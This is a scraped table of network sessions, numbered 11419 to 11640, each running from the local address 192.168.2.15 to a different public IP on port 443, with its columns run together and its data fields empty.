                                            11419192.168.2.154421086.112.206.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11420192.168.2.153637680.193.44.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11421192.168.2.156072231.72.65.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11422192.168.2.1547774126.211.55.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11423192.168.2.153917452.117.252.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11424192.168.2.153828858.26.247.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11425192.168.2.1541422154.19.194.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11426192.168.2.1552106161.211.44.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11427192.168.2.1560448223.7.87.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11428192.168.2.1558286168.62.189.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11429192.168.2.154393692.73.237.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11430192.168.2.155851485.248.120.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11431192.168.2.1545248107.159.241.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11432192.168.2.153719638.237.162.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11433192.168.2.153302878.17.31.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11434192.168.2.154960423.97.24.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11435192.168.2.153586687.74.102.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11436192.168.2.1547184177.200.146.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11437192.168.2.1547754207.167.47.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11438192.168.2.154875646.31.252.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11439192.168.2.15397828.58.106.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11440192.168.2.1546808188.41.158.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11441192.168.2.1547788138.105.207.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11442192.168.2.1558314185.49.213.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11443192.168.2.1560250130.100.129.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11444192.168.2.1542690173.20.166.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11445192.168.2.1534302145.56.171.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11446192.168.2.155341842.73.232.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11447192.168.2.154528866.140.44.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11448192.168.2.153594651.101.0.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11449192.168.2.155584896.121.159.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11450192.168.2.15435081.216.207.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11451192.168.2.1544372218.96.197.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11452192.168.2.1552404103.152.164.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11453192.168.2.154732258.238.220.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11454192.168.2.1549626201.34.175.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11455192.168.2.154260840.185.86.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11456192.168.2.1557816192.159.151.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11457192.168.2.1552856155.51.2.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11458192.168.2.1545618223.184.48.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11459192.168.2.1551700115.4.37.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11460192.168.2.154810465.37.7.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11461192.168.2.1547614168.72.221.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11462192.168.2.153353265.131.235.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11463192.168.2.1553796120.7.61.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11464192.168.2.153985673.75.75.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11465192.168.2.153857619.71.45.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11466192.168.2.1559708199.74.72.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11467192.168.2.154487452.109.16.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11468192.168.2.155612699.163.98.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11469192.168.2.153802240.252.53.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11470192.168.2.1553256110.236.60.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11471192.168.2.1536858158.83.97.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11472192.168.2.1549130208.70.39.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11473192.168.2.1536398142.221.114.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11474192.168.2.1537002170.210.71.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11475192.168.2.1538784100.52.168.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11476192.168.2.153625631.236.132.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11477192.168.2.1548134195.62.2.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11478192.168.2.155153050.242.3.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11479192.168.2.1534014207.175.113.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11480192.168.2.154113885.32.166.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11481192.168.2.154676699.164.235.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11482192.168.2.15337881.131.173.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11483192.168.2.154997285.253.249.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11484192.168.2.154450292.113.143.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11485192.168.2.154579276.86.170.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11486192.168.2.155451017.231.147.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11487192.168.2.1533084131.17.245.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11488192.168.2.1546292210.124.150.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11489192.168.2.1535798103.69.10.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11490192.168.2.1533372154.116.211.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11491192.168.2.1545186153.49.52.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11492192.168.2.155695892.36.200.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11493192.168.2.1547218115.117.177.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11494192.168.2.1551676149.119.169.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11495192.168.2.1554710103.12.27.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11496192.168.2.1535992134.24.145.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11497192.168.2.15448608.7.43.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11498192.168.2.1542192158.184.209.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11499192.168.2.1560108116.139.213.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11500192.168.2.155174240.207.70.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11501192.168.2.155394425.19.106.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11502192.168.2.153954092.186.56.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11503192.168.2.155100439.212.187.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11504192.168.2.1560562120.138.153.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11505192.168.2.1552374168.184.220.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11506192.168.2.1548716124.69.6.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11507192.168.2.1559506183.178.171.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11508192.168.2.1555462148.17.234.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11509192.168.2.1543710182.236.191.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11510192.168.2.1554236210.219.197.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11511192.168.2.1536772173.199.91.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11512192.168.2.155791439.101.15.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11513192.168.2.153831867.46.247.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11514192.168.2.1554092168.95.158.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11515192.168.2.1536970166.179.92.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11516192.168.2.1539482203.111.4.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11517192.168.2.1552684103.77.142.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11518192.168.2.1547520158.40.112.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11519192.168.2.153488497.146.133.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11520192.168.2.155729851.62.36.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11521192.168.2.1548818160.208.5.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11522192.168.2.154673432.241.89.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11523192.168.2.154168685.85.125.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11524192.168.2.156011624.8.188.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11525192.168.2.154627449.103.228.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11526192.168.2.1546230161.185.7.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11527192.168.2.1533130154.110.57.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11528192.168.2.1553394212.235.137.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11529192.168.2.154344092.99.139.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11530192.168.2.1533606158.95.10.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11531192.168.2.1547474138.223.53.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11532192.168.2.1559772213.207.77.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11533192.168.2.1537892152.176.153.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11534192.168.2.1540542193.87.131.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11535192.168.2.1541644188.85.23.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11536192.168.2.154179282.70.63.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11537192.168.2.1552402136.6.49.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11538192.168.2.155925886.94.168.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11539192.168.2.153321044.175.25.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11540192.168.2.1546884196.98.193.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11541192.168.2.155898438.72.57.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11542192.168.2.1534834206.79.171.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11543192.168.2.1540076138.7.138.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11544192.168.2.1544536125.70.182.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11545192.168.2.1558612159.217.9.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11546192.168.2.1559186113.209.84.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11547192.168.2.1539480169.234.219.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11548192.168.2.1557238163.129.30.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11549192.168.2.1535272102.106.232.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11550192.168.2.155121259.59.248.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11551192.168.2.1537738200.182.6.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11552192.168.2.1555184163.169.84.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11553192.168.2.1542038110.49.48.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11554192.168.2.1551006195.100.247.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11555192.168.2.1551212100.250.10.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11556192.168.2.1551366178.68.117.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11557192.168.2.154522070.235.229.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11558192.168.2.1555554218.136.184.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11559192.168.2.1535242122.111.171.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11560192.168.2.1542166183.56.96.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11561192.168.2.1548002155.138.31.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11562192.168.2.1543890163.199.83.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11563192.168.2.153695841.238.14.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11564192.168.2.1544586122.143.154.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11565192.168.2.1537168161.141.241.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11566192.168.2.1536114115.18.65.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11567192.168.2.1560104120.95.34.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11568192.168.2.1555840130.23.41.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11569192.168.2.154731840.61.119.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11570192.168.2.1538498101.200.187.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11571192.168.2.1538142182.2.208.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11572192.168.2.154003680.62.23.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11573192.168.2.154463674.118.172.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11574192.168.2.1542092111.78.52.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11575192.168.2.154123493.197.87.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11576192.168.2.155400850.16.177.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11577192.168.2.155862892.126.127.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11578192.168.2.1539028140.224.113.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11579192.168.2.1540472134.84.230.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11580192.168.2.1546240111.94.106.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11581192.168.2.155892424.40.139.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11582192.168.2.155879649.41.150.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11583192.168.2.155215618.115.76.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11584192.168.2.153782851.105.253.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11585192.168.2.154100466.90.162.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11586192.168.2.1556022219.229.161.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11587192.168.2.1554596211.161.242.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11588192.168.2.1553820136.221.99.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11589192.168.2.1557850144.109.232.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11590192.168.2.1535226111.249.233.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11591192.168.2.1553494193.40.66.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11592192.168.2.155783613.124.112.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11593192.168.2.1548646189.33.116.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11594192.168.2.153874049.79.150.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11595192.168.2.1541292166.90.132.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11596192.168.2.1551830223.238.2.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11597192.168.2.1543898105.66.220.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11598192.168.2.154974882.210.143.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11599192.168.2.1554264106.154.110.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11600192.168.2.155700270.64.64.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11601192.168.2.154354668.159.233.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11602192.168.2.1537254162.226.87.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11603192.168.2.153476246.177.54.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11604192.168.2.1548960161.60.26.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11605192.168.2.1547942142.104.5.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11606192.168.2.155065838.194.190.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11607192.168.2.1535140161.197.69.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11608192.168.2.1543454213.156.134.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11609192.168.2.155781247.3.81.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11610192.168.2.155447427.218.189.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11611192.168.2.1547568178.119.114.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11612192.168.2.1551126113.145.157.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11613192.168.2.155029038.1.71.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11614192.168.2.153758439.208.232.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11615192.168.2.1548942161.94.78.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11616192.168.2.1538012159.55.162.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11617192.168.2.154600686.255.231.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11618192.168.2.1535794217.20.138.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11619192.168.2.1553186138.165.115.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11620192.168.2.1550952209.165.102.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11621192.168.2.1559064175.96.5.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11622192.168.2.1555590178.108.139.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11623192.168.2.153297219.5.244.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11624192.168.2.1553630183.146.159.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11625192.168.2.154700891.35.99.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11626192.168.2.1552700108.114.232.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11627192.168.2.155999849.234.129.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11628192.168.2.1548804193.35.8.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11629192.168.2.155706896.119.73.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11630192.168.2.1543146157.5.58.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11631192.168.2.1547584185.244.165.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11632192.168.2.1545364209.12.212.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11633192.168.2.1554882169.89.245.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11634192.168.2.155253053.25.84.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11635192.168.2.155151842.198.232.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11636192.168.2.1550256117.9.137.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11637192.168.2.1536580171.94.15.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11638192.168.2.1555776167.9.87.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11639192.168.2.1557026193.47.201.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11640192.168.2.1543660155.86.137.82443
                                            TimestampBytes transferredDirectionData


